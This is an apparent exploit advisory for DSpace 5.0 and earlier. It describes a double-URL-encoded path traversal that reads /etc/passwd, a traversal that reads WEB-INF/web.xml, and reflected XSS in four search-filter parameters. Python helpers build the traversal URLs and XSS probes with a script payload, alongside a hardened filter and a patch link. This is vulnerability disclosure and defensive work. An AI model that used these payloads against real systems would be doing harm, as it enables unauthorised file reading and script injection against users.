DSpace 5.0 and earlier suffers from several vulnerabilities, including cross-site scripting (XSS) and path traversal.

Exploit Title: DSpace Multiple Vulnerabilities

Date: 3/2/2015
Exploit Author: Khalil Shreateh
Software Link: http://demo.dspace.org/
Version: DSpace <= 5.0
Tested on: Windows 7
 
Quote: 
"DSpace open source software is a turnkey repository application used by more than 1000+ organizations and institutions worldwide to provide durable access to digital resources."
 
Vulnerabilities 

XMLUI (Cocoon/XSLT) - The XML / XSLT / Cocoon user interface

This interface suffers from a path traversal vulnerability. To exploit it, the dot (.) is double URL-encoded: on the first pass . becomes %2e, and on the second pass the % of that sequence becomes %25. A check that decodes the path only once therefore still sees %2e%2e/ rather than ../ and lets the request through.

So ../ becomes %252e%252e/

POC : 

http://TARGET/static/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
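The following Python is an added example, not code from the advisory or from DSpace. It rebuilds the PoC path programmatically and shows why the double encoding matters: a filter that URL-decodes once and looks for ".." passes the double-encoded form, whereas a filter that decodes to a fixed point before checking rejects it. TARGET is the advisory's placeholder host; the naive and hardened filters are illustrative, not DSpace's code.

```python
from urllib.parse import unquote

# Added example, not code from the advisory or from DSpace. "TARGET" is the
# advisory's placeholder host; depth 13 reproduces the PoC above.
TARGET = "http://TARGET"


def percent_encode_all(s: str) -> str:
    """Percent-encode every byte, including '.', which urllib.parse.quote never encodes."""
    return "".join(f"%{b:02x}" for b in s.encode("utf-8"))


def double_encode(s: str) -> str:
    """First pass: '..' -> '%2e%2e'. Second pass encodes only the '%' signs produced
    by the first pass: '%2e%2e' -> '%252e%252e', the form used in the PoC."""
    return percent_encode_all(s).replace("%", "%25")


def traversal_path(depth: int, target_file: str, base: str = "/static/") -> str:
    """`depth` double-encoded '../' hops below `base`, followed by the file to read."""
    return base + (double_encode("..") + "/") * depth + target_file.lstrip("/")


def traversal_url(depth: int, target_file: str) -> str:
    """Full PoC URL, e.g. traversal_url(13, "etc/passwd") for the advisory's payload."""
    return TARGET + traversal_path(depth, target_file)


def decode_fully(path: str, max_rounds: int = 5):
    """URL-decode until the string stops changing. Returns None if it is still
    changing after `max_rounds`, which a server should treat as hostile."""
    cur = path
    for _ in range(max_rounds):
        nxt = unquote(cur)
        if nxt == cur:
            return cur
        cur = nxt
    return None


def naive_filter(path: str) -> bool:
    """Decode once and reject '..'. Returns True when the request is allowed.
    A double-encoded '..' is still '%2e%2e' after one decode, so it slips through;
    any later component that decodes again turns it back into '..'."""
    return ".." not in unquote(path)


def hardened_filter(path: str) -> bool:
    """Decode to a fixed point, then reject any '..' path segment. Returns True when
    the request is allowed."""
    decoded = decode_fully(path)
    return decoded is not None and ".." not in decoded.split("/")


if __name__ == "__main__":
    poc = traversal_path(13, "etc/passwd")
    print(TARGET + poc)
    print("naive filter allows it:   ", naive_filter(poc))     # True  (bypassed)
    print("hardened filter allows it:", hardened_filter(poc))  # False (blocked)
```

Single-encoded %2e%2e/ is caught by the naive filter, which is exactly why the PoC needs the second layer of encoding; the hardened version closes that gap by decoding until nothing changes before it inspects the path.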

JSPUI (JSP) - traditional JSP-based interface 

A. Path Traversal Vulnerability

The first vulnerability in this interface allows reading files from the deployed web application on the server: appending a file path to a handle URL returns that file. The PoC retrieves the deployment descriptor WEB-INF/web.xml, which a servlet container never serves directly.

POC : 

http://TARGET/handle/10673/1/WEB-INF/web.xml

B. Cross Site Scripting (XSS) Vulnerability

The second vulnerability in this interface allows an attacker to execute arbitrary script and display arbitrary content in a victim user's browser.

The vulnerability exists in several request parameters:

- filtertype

- filter_type_1

- filtername

- filter_field_1

None of the above parameters is sanitized or output-encoded correctly.
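The following Python is an added example, not code from the advisory or from DSpace. It builds one probe URL per listed parameter, each carrying a canary that contains the characters an HTML attribute context must encode, and classifies how a response echoes that canary. The base URL http://TARGET/search, the canary and the two sample response bodies are constructed for this demonstration; only the parameter names come from the advisory.

```python
import html
from urllib.parse import urlencode

# Added example, not code from the advisory or from DSpace. Parameter names are
# from the advisory; the canary and the sample bodies below are constructed.
XSS_PARAMS = ["filtertype", "filter_type_1", "filtername", "filter_field_1"]
CANARY = 'zq9"><svg/onload=alert(1)>'  # unique prefix plus the characters " < > that must be encoded


def probe_urls(base: str, params=XSS_PARAMS, canary: str = CANARY) -> list:
    """One URL per parameter, each carrying the canary in that parameter only, so a
    hit can be attributed to a single parameter."""
    return [f"{base}?{urlencode({p: canary})}" for p in params]


def reflection_status(body: str, canary: str = CANARY) -> str:
    """Classify how a response echoes the canary:
       'unescaped' - reflected verbatim, so the injected tag is live (exploitable)
       'escaped'   - reflected with ", < and > entity-encoded (safe in attribute context)
       'partial'   - reflected in some other form; inspect by hand, a raw " in an
                     attribute is still a breakout even if < and > were encoded
       'absent'    - not reflected at all"""
    marker = canary[:3]  # the unique prefix locates where the echo begins
    idx = body.find(marker)
    if idx == -1:
        return "absent"
    if body.startswith(canary, idx):
        return "unescaped"
    if body.startswith(html.escape(canary, quote=True), idx):
        return "escaped"
    return "partial"


# Constructed sample responses imitating a search-filter form that echoes filtertype.
VULNERABLE_BODY = f'<input type="hidden" name="filtertype" value="{CANARY}">'
FIXED_BODY = f'<input type="hidden" name="filtertype" value="{html.escape(CANARY, quote=True)}">'


if __name__ == "__main__":
    for url in probe_urls("http://TARGET/search"):
        print(url)
    print("vulnerable response:", reflection_status(VULNERABLE_BODY))  # unescaped
    print("fixed response:     ", reflection_status(FIXED_BODY))       # escaped
```

In practice the bodies come from fetching each probe URL; the classifier is deliberately strict, so anything that is neither verbatim nor fully entity-encoded is flagged for manual review rather than assumed safe.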

 

PATCH : 

DSpace team announcement: 
http://dspace.2283337.n4.nabble.com/DSPACE-SECURITY-ADVISORY-New-DSpace-5-1-4-3-and-3-4-releases-resolve-security-issues-in-XMLUI-and-JSI-td4676801.html